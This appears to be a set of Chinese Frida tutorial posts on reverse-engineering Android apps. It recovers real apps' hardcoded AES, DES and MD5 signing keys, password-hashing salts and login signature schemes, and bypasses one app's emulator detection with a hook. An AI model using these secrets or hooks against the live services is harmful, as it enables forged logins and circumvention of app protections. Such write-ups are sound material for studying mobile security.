[*] doFinal结果(base64):WiQ5rxBBzdG9HfOKnWEHkyGQuDz2vnYQzFR2fuTJe7YjbcTp1LAOdAi5rdAdj5Qj7r2NdThsIMHIT4dREE9QyUCPKyivgtPqucVrRCmEw5nWVYG99ogV3qZDAWZ2foU4unNJhG6H7RMit5Bm59rFJ1h8DH2ZUARuY6h69kzkeeURP83+PzXQpA+L3JFxQtlDrQIkvwMVyWf7lpq7IXihx2TjEcZ6quvW1pNip/3yu2QEDbVEQ1cvqJfNFzPvnc1HM6NYgQgwguvdLMQajRad6CS2Iec0RbOlAE/M1LCRCV8PLC78hxFvgnI8blnHw3nCoO7uy2wN7v3aKxWBtaDlbHun8erKj1msrlouXCTV3HJzah/BwMt+aDNrM2WtJQ4A+JugmXFAPC7SZaLNYqn9xA==

如下数据是最终加密的结果，即发给服务器的数据。

WiQ5rxBBzdG9HfOKnWEHkyGQuDz2vnYQzFR2fuTJe7YjbcTp1LAOdAi5rdAdj5Qj7r2NdThsIMHIT4dREE9QyUCPKyivgtPqucVrRCmEw5nWVYG99ogV3qZDAWZ2foU4unNJhG6H7RMit5Bm59rFJ1h8DH2ZUARuY6h69kzkeeURP83+PzXQpA+L3JFxQtlDrQIkvwMVyWf7lpq7IXihx2TjEcZ6quvW1pNip/3yu2QEDbVEQ1cvqJfNFzPvnc1HM6NYgQgwguvdLMQajRad6CS2Iec0RbOlAE/M1LCRCV8PLC78hxFvgnI8blnHw3nCoO7uy2wN7v3aKxWBtaDlbHun8erKj1msrlouXCTV3HJzah/BwMt+aDNrM2WtJQ4A+JugmXFAPC7SZaLNYqn9xA==

这里hook到了加密算法和密钥

1 2	[] 算法名：AES\|Dec密钥:DD240BF148903189BF8DAE0C220C9591 [] 算法名：AES\|Hex密钥:4444323430424631343839303331383942463844414530433232304339353931

偏移模式

1	模式填充:AES/CBC/PKCS5Padding

iv向量

1	iv向量(hex):00000000000000000000000000000000

Password加密过程分析

输出中可以看到其加密之前的数据为

1
2

num=0&userid=1388888888&Password=9c9c5f3bff756cf5395265b6c5f0d8f0&tid=2&ts=1578400865589&nonce=fb4f89a9464e3a318111b337f92a9f1c&resign=e8ca11ce1d27aa18ed6840617b8cbcf7&pwdcode=YTEyMzQ1Ng==
&time=2020-01-07 21:31:33&wt=1&uuid=77a0332f1ca14daf9337f941bcc86e70&appversion=3.4.8&Type=Android&xp=0

数据中userid为用户名，Password为密码，这里的密码是密文9c9c5f3bff756cf5395265b6c5f0d8f0，这里并不知道是什么密文。此密文并非输入的密码的md5值。在输出中我们可以直接搜索这一段密文。

搜索到9c9c5f3bff756cf5395265b6c5f0d8f0为如下输出结果。

[*] ======================================
[*] update:@345Kie(873_dfbKe>d3<.d23432=d67d5e705490b20f8d8a3c8731d4c535
[*] java.lang.Exception
at java.security.MessageDigest.digest(Native Method)
at java.security.MessageDigest.digest(MessageDigest.java:278)
at java.security.MessageDigest.digest(Native Method)
at com.faloo.network.util.MD5.MD5(Proguard:22)
at com.faloo.util.EncryptUtil._e16(Native Method)
at com.faloo.util.EncryptUtil.EncryptPwd(Proguard:23)
at com.faloo.network.service.a.c.a(Proguard:119)
at com.faloo.app.activity.LoginPageActivity$13.a(Proguard:941)
at io.reactivex.internal.operators.observable.ObservableCreate.b(Proguard:40)
at io.reactivex.e.a(Proguard:11194)
at io.reactivex.internal.operators.observable.ObservableSubscribeOn$a.run(Proguard:96)
at io.reactivex.k$a.run(Proguard:463)
at io.reactivex.internal.schedulers.ScheduledRunnable.run(Proguard:66)
at io.reactivex.internal.schedulers.ScheduledRunnable.call(Proguard:57)
at java.util.concurrent.FutureTask.run(FutureTask.java:237)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:152)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:265)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587)
at java.lang.Thread.run(Thread.java:818)

[*] ======================================
[*] digest结果(hex):9c9c5f3bff756cf5395265b6c5f0d8f0
[*] digest结果(base64):nJxfO/91bPU5UmW2xfDY8A==
[*] digest结果(hex):9c9c5f3bff756cf5395265b6c5f0d8f0
[*] digest结果(base64):nJxfO/91bPU5UmW2xfDY8A==

在这个过程中输入的为@345Kie(873_dfbKe>d3<.d23432=d67d5e705490b20f8d8a3c8731d4c535输出的9c9c5f3bff756cf5395265b6c5f0d8f0

通过md5加密对比如下图，发现此过程为md5加密过程。

@345Kie(873_dfbKe>d3<.d23432=d67d5e705490b20f8d8a3c8731d4c535中，前一段@345Kie(873_dfbKe>d3<.d23432=并没有搜索到，可能为固定值拼接，通过多此测试发现确实为固定值拼接。故直接搜索后32位d67d5e705490b20f8d8a3c8731d4c535跟到如下输出过程。

[*] ======================================
[*] update:EW234@![#$&]*{,OP}Kd^w349Op+-32_a1234561578400865589
[*] java.lang.Exception
at java.security.MessageDigest.digest(Native Method)
at java.security.MessageDigest.digest(MessageDigest.java:278)
at java.security.MessageDigest.digest(Native Method)
at com.faloo.network.util.MD5.MD5(Proguard:22)
at com.faloo.util.EncryptUtil._e16(Native Method)
at com.faloo.util.EncryptUtil.EncryptPwd(Proguard:23)
at com.faloo.network.service.a.c.a(Proguard:119)
at com.faloo.app.activity.LoginPageActivity$13.a(Proguard:941)
at io.reactivex.internal.operators.observable.ObservableCreate.b(Proguard:40)
at io.reactivex.e.a(Proguard:11194)
at io.reactivex.internal.operators.observable.ObservableSubscribeOn$a.run(Proguard:96)
at io.reactivex.k$a.run(Proguard:463)
at io.reactivex.internal.schedulers.ScheduledRunnable.run(Proguard:66)
at io.reactivex.internal.schedulers.ScheduledRunnable.call(Proguard:57)
at java.util.concurrent.FutureTask.run(FutureTask.java:237)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:152)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:265)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587)
at java.lang.Thread.run(Thread.java:818)

[*] ======================================
[*] digest结果(hex):d67d5e705490b20f8d8a3c8731d4c535
[*] digest结果(base64):1n1ecFSQsg+NijyHMdTFNQ==
[*] digest结果(hex):d67d5e705490b20f8d8a3c8731d4c535
[*] digest结果(base64):1n1ecFSQsg+NijyHMdTFNQ==

如上输入为EW234@![#$&]*{,OP}Kd^w349Op+-32_a1234561578400865589输出为d67d5e705490b20f8d8a3c8731d4c535。这里EW234@![#$&]*{,OP}Kd^w349Op+-32_同样为固定值，a123456为我们输入的密码，1578400865589为时间戳。此过程为MD5加密

至此我们可以获取到

1
2

num=0&userid=1388888888&Password=9c9c5f3bff756cf5395265b6c5f0d8f0&tid=2&ts=1578400865589&nonce=fb4f89a9464e3a318111b337f92a9f1c&resign=e8ca11ce1d27aa18ed6840617b8cbcf7&pwdcode=YTEyMzQ1Ng==
&time=2020-01-07 21:31:33&wt=1&uuid=77a0332f1ca14daf9337f941bcc86e70&appversion=3.4.8&Type=Android&xp=0

aes加密前的数据中password的加密过程：

大致流程为：

string1 = EW234@![#$&]*{,OP}Kd^w349Op+-32_+密码+时间戳，对string1进行md5加密
对md5(string1)前拼接@345Kie(873_dfbKe>d3<.d23432=，再进行一次MD5加密得到最后的password加密值。

once加密过程分析

1
2

num=0&userid=1388888888&Password=9c9c5f3bff756cf5395265b6c5f0d8f0&tid=2&ts=1578400865589&nonce=fb4f89a9464e3a318111b337f92a9f1c&resign=e8ca11ce1d27aa18ed6840617b8cbcf7&pwdcode=YTEyMzQ1Ng==
&time=2020-01-07 21:31:33&wt=1&uuid=77a0332f1ca14daf9337f941bcc86e70&appversion=3.4.8&Type=Android&xp=0

如上数据中的ts为时间戳即加密用到的时间戳，客户端将此时间戳发给服务端，因为在密码加密中用到了这个时间戳，所以服务器进行密码对比的时候也要用到这个时间戳，所以这个时间戳是一一对应的。

once值fb4f89a9464e3a318111b337f92a9f1c同样的方法去搜索

[*] update:1578400865530
[*] java.lang.Exception
at java.security.MessageDigest.digest(Native Method)
at org.faloo.app.pay.a.a(Proguard:40)
at com.faloo.app.activity.LoginPageActivity.e(Proguard:483)
at com.faloo.app.activity.LoginPageActivity.b(Proguard:111)
at com.faloo.app.activity.LoginPageActivity$3.a(Proguard:531)
at com.faloo.app.activity.LoginPageActivity$3.onNext(Proguard:517)
at io.reactivex.internal.operators.observable.ObservableObserveOn$ObserveOnObserver.drainNormal(Proguard:200)
at io.reactivex.internal.operators.observable.ObservableObserveOn$ObserveOnObserver.run(Proguard:252)
at io.reactivex.android.b.b$b.run(Proguard:109)
at android.os.Handler.handleCallback(Handler.java:739)
at android.os.Handler.dispatchMessage(Handler.java:95)
at android.os.Looper.loop(Looper.java:135)
at android.app.ActivityThread.main(ActivityThread.java:5293)
at java.lang.reflect.Method.invoke(Native Method)
at java.lang.reflect.Method.invoke(Method.java:372)
at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:903)
at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:698)

[*] ======================================
[*] digest结果(hex):fb4f89a9464e3a318111b337f92a9f1c
[*] digest结果(base64):+0+JqUZOOjGBEbM3+SqfHA==

得到如上过程，输入1578400865530输出once值。同样为md5加密。

此时间戳并非在加密过程中用到，可能在后端并未做校验。

resign加密过程分析

1
2

num=0&userid=1388888888&Password=9c9c5f3bff756cf5395265b6c5f0d8f0&tid=2&ts=1578400865589&nonce=fb4f89a9464e3a318111b337f92a9f1c&resign=e8ca11ce1d27aa18ed6840617b8cbcf7&pwdcode=YTEyMzQ1Ng==
&time=2020-01-07 21:31:33&wt=1&uuid=77a0332f1ca14daf9337f941bcc86e70&appversion=3.4.8&Type=Android&xp=0

这个数据中还有一个e8ca11ce1d27aa18ed6840617b8cbcf7为resign签名值。

[*] ======================================
[*] update:a1f*(DV<>ME29p08adsfKQ@N>FEP*(F&G)&B)R@PVDbvnTPFPSDFQ>QM@o9i8t5P_)(SGB?9c9c5f3bff756cf5395265b6c5f0d8f0fb4f89a9464e3a318111b337f92a9f1c
[*] java.lang.Exception
at java.security.MessageDigest.digest(Native Method)
at java.security.MessageDigest.digest(MessageDigest.java:278)
at java.security.MessageDigest.digest(Native Method)
at com.faloo.network.util.MD5.MD5(Proguard:22)
at com.faloo.util.EncryptUtil._e14(Native Method)
at com.faloo.util.EncryptUtil.EncryptRePwd(Proguard:46)
at com.faloo.network.service.a.c.a(Proguard:120)
at com.faloo.app.activity.LoginPageActivity$13.a(Proguard:941)
at io.reactivex.internal.operators.observable.ObservableCreate.b(Proguard:40)
at io.reactivex.e.a(Proguard:11194)
at io.reactivex.internal.operators.observable.ObservableSubscribeOn$a.run(Proguard:96)
at io.reactivex.k$a.run(Proguard:463)
at io.reactivex.internal.schedulers.ScheduledRunnable.run(Proguard:66)
at io.reactivex.internal.schedulers.ScheduledRunnable.call(Proguard:57)
at java.util.concurrent.FutureTask.run(FutureTask.java:237)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:152)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:265)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587)
at java.lang.Thread.run(Thread.java:818)

[*] ======================================
[*] digest结果(hex):e8ca11ce1d27aa18ed6840617b8cbcf7
[*] digest结果(base64):6MoRzh0nqhjtaEBhe4y89w==
[*] digest结果(hex):e8ca11ce1d27aa18ed6840617b8cbcf7
[*] digest结果(base64):6MoRzh0nqhjtaEBhe4y89w==

该签名与a1f*(DV<>ME29p08adsfKQ@N>FEP*(F&G)&B)R@PVDbvnTPFPSDFQ>QM@o9i8t5P_)(SGB?9c9c5f3bff756cf5395265b6c5f0d8f0fb4f89a9464e3a318111b337f92a9f1c有关。此过程也为MD5加密。其中一段为9c9c5f3bff756cf5395265b6c5f0d8f0为password值。fb4f89a9464e3a318111b337f92a9f1c为once值。前面的一段a1f*(DV<>ME29p08adsfKQ@N>FEP*(F&G)&B)R@PVDbvnTPFPSDFQ>QM@o9i8t5P_)(SGB?为固定值。

所以签名值resign为固定值+password+once然后进行md5加密。

而最后的值uuid=77a0332f1ca14daf9337f941bcc86e70可能为用户名标识或者手机设备识别码。

1
2

num=0&userid=1388888888&Password=9c9c5f3bff756cf5395265b6c5f0d8f0&tid=2&ts=1578400865589&nonce=fb4f89a9464e3a318111b337f92a9f1c&resign=e8ca11ce1d27aa18ed6840617b8cbcf7&pwdcode=YTEyMzQ1Ng==
&time=2020-01-07 21:31:33&wt=1&uuid=77a0332f1ca14daf9337f941bcc86e70&appversion=3.4.8&Type=Android&xp=0

pwdcode值为YTEyMzQ1Ng==为密码的base64。

自此如上加密数据所有部分都通过hook输出内容进行了分析。

RSA加密过程分析

在hook输出内容中还有，RSA加密过程。

[*] ======================================
[*] RSA密钥:MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCDiI/dCs429FC75NYnF82omzzAweej2VdpdaKP3DL0D/s3Hg7cnVTGBh6yRrKYI9cvBKorxdrCEaW0SXZYBH5nvmCg8qyzO8jBj08ISiukEQuqG2oS0L2sbcQl0MV7rExsyO0vlPpND7klBWikAIO1UfZW1ab/EWit1XkaXCr6nQIDAQAB
[*] java.lang.Exception
at javax.crypto.Cipher.getInstance(Native Method)
at com.faloo.util.SignUtils.encrypt(Proguard:104)
at com.faloo.util.EncryptUtil._e8(Native Method)
at com.faloo.util.EncryptUtil.getRSAEncrypt(Proguard:166)
at com.faloo.network.module.b.d(Proguard:39)
at com.faloo.network.util.e.a(Proguard:101)
at com.faloo.network.service.a.c.a(Proguard:141)
at com.faloo.app.activity.LoginPageActivity$13.a(Proguard:941)
at io.reactivex.internal.operators.observable.ObservableCreate.b(Proguard:40)
at io.reactivex.e.a(Proguard:11194)
at io.reactivex.internal.operators.observable.ObservableSubscribeOn$a.run(Proguard:96)
at io.reactivex.k$a.run(Proguard:463)
at io.reactivex.internal.schedulers.ScheduledRunnable.run(Proguard:66)
at io.reactivex.internal.schedulers.ScheduledRunnable.call(Proguard:57)
at java.util.concurrent.FutureTask.run(FutureTask.java:237)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:152)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:265)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587)
at java.lang.Thread.run(Thread.java:818)

[*] ======================================
[*] 模式填充:RSA/ECB/PKCS1Padding
[*] java.lang.Exception
at javax.crypto.Cipher.doFinal(Native Method)
at com.faloo.util.SignUtils.encrypt(Proguard:106)
at com.faloo.util.EncryptUtil._e8(Native Method)
at com.faloo.util.EncryptUtil.getRSAEncrypt(Proguard:166)
at com.faloo.network.module.b.d(Proguard:39)
at com.faloo.network.util.e.a(Proguard:101)
at com.faloo.network.service.a.c.a(Proguard:141)
at com.faloo.app.activity.LoginPageActivity$13.a(Proguard:941)
at io.reactivex.internal.operators.observable.ObservableCreate.b(Proguard:40)
at io.reactivex.e.a(Proguard:11194)
at io.reactivex.internal.operators.observable.ObservableSubscribeOn$a.run(Proguard:96)
at io.reactivex.k$a.run(Proguard:463)
at io.reactivex.internal.schedulers.ScheduledRunnable.run(Proguard:66)
at io.reactivex.internal.schedulers.ScheduledRunnable.call(Proguard:57)
at java.util.concurrent.FutureTask.run(FutureTask.java:237)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:152)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:265)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587)
at java.lang.Thread.run(Thread.java:818)

[*] ======================================
[*] doFinal参数:DD240BF148903189BF8DAE0C220C9591
[*] doFinal结果(hex):028f36e0538d52fe0b243c02cc68fc1a8a741215e868ef500e87142a84850db9e8cbacbf2e4b77b0c5088b9879b3f99d0fd57b239ffa7894b672722143affe03b504b00bf4d4c82264215d61d5e66c8db0f18f5463a544a7a8dff86f77e6ef16b885091bc6f5034003a300a1d9b38022612b4369f47b17eba5a3adfb5857f6c5
[*] doFinal结果(base64):Ao824FONUv4LJDwCzGj8Gop0EhXoaO9QDocUKoSFDbnoy6y/Lkt3sMUIi5h5s/mdD9V7I5/6eJS2cnIhQ6/+A7UEsAv01MgiZCFdYdXmbI2w8Y9UY6VEp6jf+G935u8WuIUJG8b1A0ADowCh2bOAImErQ2n0exfrpaOt+1hX9sU=

如上为RSA加密过程公钥为MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCDiI/dCs429FC75NYnF82omzzAweej2VdpdaKP3DL0D/s3Hg7cnVTGBh6yRrKYI9cvBKorxdrCEaW0SXZYBH5nvmCg8qyzO8jBj08ISiukEQuqG2oS0L2sbcQl0MV7rExsyO0vlPpND7klBWikAIO1UfZW1ab/EWit1XkaXCr6nQIDAQAB

模式填充:RSA/ECB/PKCS1Padding

加密数据为：DD240BF148903189BF8DAE0C220C9591

加密结果为：Ao824FONUv4LJDwCzGj8Gop0EhXoaO9QDocUKoSFDbnoy6y/Lkt3sMUIi5h5s/mdD9V7I5/6eJS2cnIhQ6/+A7UEsAv01MgiZCFdYdXmbI2w8Y9UY6VEp6jf+G935u8WuIUJG8b1A0ADowCh2bOAImErQ2n0exfrpaOt+1hX9sU=

这个过程是为了加密AES密钥，因为RSA加密的加密数据长度是有限的。

RSA一次能加密的明文长度与密钥长度成正比：
len_in_byte(raw_data) = len_in_bit(key)/8 -11，如 1024bit 的密钥，一次能加密的内容长度为 1024/8 -11 = 117 byte。
所以非对称加密一般都用于加密对称加密算法的密钥，而不是直接加密内容

因为AES是对称加密

对称加密就是指，加密和解密使用同一个密钥的加密方式。
发送方使用密钥将明文数据加密成密文，然后发送出去，接收方收到密文后，使用同一个密钥将密文解密成明文读取。
优点：加密计算量小、速度块，适合对大量数据进行加密的场景。

所以通常流量数据为AES，但是AES存在安全问题就是，AES的密钥要是被截获了就可以任意解密数据。

所以目前APP中的加密套路就是:

客户端：流量数据通过AES加密发送给服务端，同时AES密钥随机生成通过RSA公钥加密发服务端

服务端：服务端接收到RSA加密后的AES密钥通过RSA私钥进行解密得到AES密钥，然后通过AES密钥解密流量数据进行验证。

frida-Hook实战一

2019-12-23T12:00:04.000Z

邻居合伙人Hook

对邻居合伙人APP登录sign签名算法的hook。

在登录处进行抓包操作，可以看到登录数据报中有apisign字段。

对APK进行反编译，搜索apisign关键字。

newBodyBuilder.add("data", data.toString());
newBodyBuilder.add("apisign", MD5Util.ToMD5(Constants.MD5_KEY, data.toString()));
L.d("请求地址RequestUrl=====", oldUrl.url().toString());
L.d("请求参数Params=========", data.toString());
L.json(data.toString());
return newBodyBuilder.build();

根据代码可以看到，apisign内容主要是通过MD5Util类的ToMD5()方法生成的，跳转到ToMD5()方法内容：

public static String ToMD5(String secretKey, String pstr) {    pstr = secretKey + pstr;    char[] hexDigits = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'};    try {        MessageDigest md5Temp = MessageDigest.getInstance("MD5");        md5Temp.update(pstr.getBytes("UTF8"));        char[] str = new char[(j * 2)];        int k = 0;        for (byte byte0 : md5Temp.digest()) {            int i = k + 1;            str[k] = hexDigits[(byte0 >>> 4) & 15];            k = i + 1;            str[i] = hexDigits[byte0 & 15];        }        return new String(str).toLowerCase();    } catch (Exception e) {        return null;    }}

这个方法有两个参数，一个secretkey和pstr。且为普通函数。通过静态分析，MD5Util.ToMD5()传入两个值，一个是Constants.MD5_KEY,跳转发现是Constants类的静态变量。

其值为：d367f4699214cec412f7c2a1d513fe05。另外一个变量则是app登录信息。

而用frida主要是对MD5Util.ToMD5()方法的两个变量进行hook。

编写如下hook脚本。

import frida
import sys
import time
 
jscode = """
Java.perform(function () {
    var md5 = Java.use('com.softgarden.baselibrary.utils.MD5Util');
    md5.ToMD5.implementation = function (a, b) {
        send("Hook Start...");
        console.log("arg1:   " + a );
        console.log("arg2:   " + b);
        var res = this.ToMD5(a, b);
        console.log("return:   " + res);
        send("Success!");
        return res;
    }
});
"""
 
def message(message, data):
    if message["type"] == 'send':
        print("[*] {0}".format(message['payload']))
    else:
        print(message)


device = frida.get_remote_device()
pid = device.spawn(["com.ljhhr.mobile"])
device.resume(pid)
time.sleep(1)  # Without it Java.perform silently fails
session = device.attach(pid)
script = session.create_script(jscode)
script.on("message", message)
script.load()
sys.stdin.read()

运行如上脚本进行hook，可以看到如下结果。

通过多次hook可以看到第一个变量为固定的，即我们静态分析代码得到的：d367f4699214cec412f7c2a1d513fe05

第二个参数为输入登录的输入内容。至此，完成对该APP的sign算法的hook。

嘟嘟牛在线Hook

同样在登录界面，进行抓包操作。

同时对apk进行反编译。可以搜索url路径关键字：user/login，也可以搜索数据报关键字：Encrypt。

搜索user/login定位到类名：com.dodonew.online.ui.LoginActivity中的requestNetwork方法。

分析代码，可知数据报中的内容通过addRequestMap方法添加。跳转到com.dodonew.online.http.JsonRequest类的addRequestMap方法。

定位到我们在数据报中看到的关键字：Encrypt。

此处的encrypt即加密后的内容。

1	String encrypt = RequestUtil.encodeDesMap(RequestUtil.paraMap(addMap, Config.BASE_APPEND, "sign"), this.desKey, this.desIV);

通过des算法进行加密后的数据。该方法为encodeDesMap。其有三个参数。

跟踪变量desKey，desIV。跳转到com.dodonew.online.config.Config类。

可以得到des加密算法的key值为65102933，偏移值IV为：32028092。

跟踪encodeDesMap方法的第一个参数。RequestUtil.paraMap(addMap, Config.BASE_APPEND, “sign”)

跟进paraMap方法到com.dodonew.online.http.RequestUtil类。

发现存在sign,跟进md5方法到com.dodonew.online.util.Utils类。

可以看到md5是一个普通的方法。如果需要进行hook，直接hook参数值和返回值就行了。

hook部分的js代码如下：

var Utils = Java.use('com.dodonew.online.util.Utils');
Utils.md5.implementation = function (a) {
    send("Hook Start md5...");
    console.log("md5-arg:   " + a);
    var result = this.md5(a);
    console.log("md5-result:   " + result);
    send("Success!");
    return result;
}

而com.dodonew.online.http.RequestUtil类下的encodeDesMap方法是一个重载方法。

所以在传入需要hook的方法是要用到overload。且这里的重载参数类型为String。所以要用overload(‘java.lang.String’,’java.lang.String’,’java.lang.String’)。因为String在Java中是以类的形式存在的数据类型。同时String类在java.lang包中。
故此处的js代码为：

var RequestUtil = Java.use('com.dodonew.online.http.RequestUtil');    RequestUtil.encodeDesMap.overload('java.lang.String','java.lang.String','java.lang.String').implementation = function (data, key ,iv) {
        send("Hook Start encodeDesMap...");
       console.log("encodeDesMap-data:   " + data);
       console.log("encodeDesMap-key:   " + key);
       console.log("encodeDesMap-iv:   " + iv);
        var result = this.encodeDesMap(data, key ,iv);
       console.log("encodeDesMap-result:   " + result);
        send("Success!");
        return result;
    }

python通用hook模版加载两段js代码即可对该APP进行hook。

成功hook到所有参数。

Soul Hook

Soul是一款社交app，此APP在模拟器中是无法启动的,如下：

显示SoulApp暂不支持模拟器，请稍后再试~

搜索关键字SoulApp暂不支持模拟器，请稍后再试~定位到cn.soulapp.android.ui.splash.SplashActivity类下。

可见此处判断if (cn.soulapp.android.utils.j.e())返回的是true。

跟进方法e到类。cn.soulapp.android.utils.j


public static boolean e() {
    try {
        SoulApp b = SoulApp.b();
        Intent intent = new Intent();
        intent.setData(Uri.parse("tel:123456"));
        intent.setAction("android.intent.action.DIAL");
        return Build.FINGERPRINT.startsWith("generic") || Build.FINGERPRINT.toLowerCase().contains("vbox") || Build.FINGERPRINT.toLowerCase().contains("test-keys") || Build.MODEL.contains("google_sdk") || Build.MODEL.contains("Emulator") || Build.SERIAL.equalsIgnoreCase("unknown") || Build.SERIAL.equalsIgnoreCase(DispatchConstants.ANDROID) || Build.MODEL.contains("Android SDK built for x86") || Build.MANUFACTURER.contains("Genymotion") || ((Build.BRAND.startsWith("generic") && Build.DEVICE.startsWith("generic")) || "google_sdk".equals(Build.PRODUCT) || ((TelephonyManager) b.getSystemService("phone")).getNetworkOperatorName().toLowerCase().equals(DispatchConstants.ANDROID) || (intent.resolveActivity(b.getPackageManager()) != null ? 1 : null) == null);
    } catch (Exception e) {
        return false;
    }
}

这里我们只需要把e方法的返回值改为false，即可跳过模拟器验证。

js代码如下：

var j = Java.use('cn.soulapp.android.utils.j');
j.e.implementation = function (a) {
    send("Hook Start ...");
    return false;
}

运行hook脚本，成功进入登录界面

frida-Java层代码Hook

2019-12-06T02:37:05.000Z

Hook构造方法

要hook的是一个类的构造函数

public class Utils {
    public static Money getMoney() {
        return new Money(60, "RMB");
    }
...
}

我们可以通过$init来获取并修改一个类的构造方法。（注意，js是弱类型语言，而Java强类型，注意构造的时候的类型转换。）

获取参数可以通过自定义参数名也可以直接用系统隐含的arguments变量获取即可

下面是jscode

var money=Java.use("com.XXXX.app.Money");
money.$init.implementation = function(a, b)
{
    console.log("Hook Start...");
    send(arguments[0]);
    send(arguments[1]);
    return this.$init(a,b);
}

Hook重载方法

要hook的重载方法

public class Utils {
    public static String test() {
        return "this is test without argument";
    }

    public static String test(int num) {
        return "this is test with num "+num;
    }
...
}

在方法后面加一个overload属性，参数为函数的类型，类型用字符串传入，用于指定具体要hook的方法。例如utils.test.overload("int").implementation。
注意，要填写类的路径，例如如果是字符串类型，则要用overload("int","java.lang.String")
jscode:

utils.test.overload("int").implementation = function(a)
    {
        console.log("Hook Start...");
        send(arguments[0]);
        console.log("Hook Success...");
        return "This overload func is hooked";
    }

Hook对象参数的构造

要hook的以对象为参数的方法

package com.XXXX.app;

public class Utils {
    public static String test(Money money) {
        return money.getInfo();
    }
....
}

这里我们使用一个类型的$new来实例化一个类
jscode:

jscode = """
Java.perform(function(){
    var utils = Java.use("com.XXXX.app.Utils");
    var money=Java.use("com.XXXX.app.Money");
    
    utils.test.overload("com.XXXX.app.Money").implementation = function(a)
    {
        console.log("Hook Start...");
        send(a.getInfo());
        var m = money.$new(6666,"DOLLAR");
        send(m.getInfo());
        return m.getInfo();
        //return this.test(m);
    }
});
"""

修改对象属性的值

常规方法

如果obj.Attr的话，获取到的还是对象，例如a.name的返回值是[*] {'value': '美元', 'fieldType': 2, 'fieldReturnType': {'className': 'java.lang.String', 'name': 'Ljava/lang/String;', 'type': 'pointer', 'size': 1}} [*] 美元
我们使用a.name.value就能获取对象属性的值了。
例如

utils.test.overload("com.xiaojianbang.app.Money").implementation = function(a)
    {
        console.log("Hook Start...");
        send(a.name); //object
        send(a.name.value); //real value
        var m = money.$new(6666,"DOLLAR");
        m.name.value="ForeignMoney";
        send(m.getInfo());
        return m.getInfo();
        //return this.test(m);
    }

Java反射

对于私有属性，我们可以用Java反射的方法设置。
在Java反射中，通过Java.cast(m.getClass(),clazz).getDeclaredField('num')，m为一个实例化对象，后面getDeclaredField可以获得属性。通过Java.use('java.lang.Class');获取类的构造器
这里，通过属性的get(ObjectsInstantiated)可以获取值，通过属性的setInt(ObjectsInstantiated，value)可以设置一个对象的属性值。ObjectsInstantiated为一个对象。
这里，对于反射后的值，用console.log可以很好的输出值，而send在此处会打印对象。

Java.perform(function(){
    var utils = Java.use("com.XXXX.app.Utils");
    var money=Java.use("com.XXXX.app.Money");
    
    utils.test.overload("com.XXXX.app.Money").implementation = function(a)
    {
        console.log("Hook Start...");
        var m = money.$new(6666,"DOLLAR");
        var clazz = Java.use('java.lang.Class');
        var num_id = Java.cast(m.getClass(),clazz).getDeclaredField('num');
        num_id.setAccessible(true);
        var value = num_id.get(m);
        console.log(value);
        send(value); // have format problem
        num_id.setInt(m,23333);
        console.log(num_id.get(m));
        return this.test(m);
    }
});

Hook内部类

要hook的内部类。

在 Java 中，可以将一个类定义在另一个类里面或者一个方法里面，这样的类称为内部类。

class Circle {
    double radius = 0;
     
    public Circle(double radius) {
        this.radius = radius;
    }
     
    class Draw {     //内部类
        public void drawSahpe() {
            System.out.println("drawshape");
        }
    }
}

在获取要hook的类后加$和内部类名。

var inInnerClass = Java.use('com.XXXX.app.Circle$Draw');

inInnerClass.drawSahpe.implementation = function()
{
  ...
}

打印方法堆栈信息

用Java.use方法获取类型变量：var Exception = Java.use(“java.lang.Exception”)

然后是js中支持throw语法的，直接在需要打印堆栈信息的方法中调用即可。

AndroidLog = Java.use("android.util.Log")
AndroidException = Java.use("java.lang.Exception")
function printStackTrace(){
console.log(AndroidLog .getStackTraceString(AndroidException .$new()));
}

总结

Java层代码Hook操作

1、hook方法包括构造方法和对象方法，构造方法固定写法是$init，普通方法直接是方法名，参数可以自己定义也可以使用系统隐含的变量arguments获取。
2、修改方法的参数和返回值，直接调用原始方法通过传入想要修改的参数来做到修改参数的目的，以及修改返回值即可。
3、构造对象和修改对象的属性值，直接用反射进行操作，构造对象用固定写法的$new即可。
4、直接用Java的Exception对象打印堆栈信息，然后通过adb logcat -s AndroidRuntime来查看异常信息跟踪代码。

总结：获取对象的类类型是Java.use方法，方法有重载的话用overload(…….)解决。

frida-安装配置

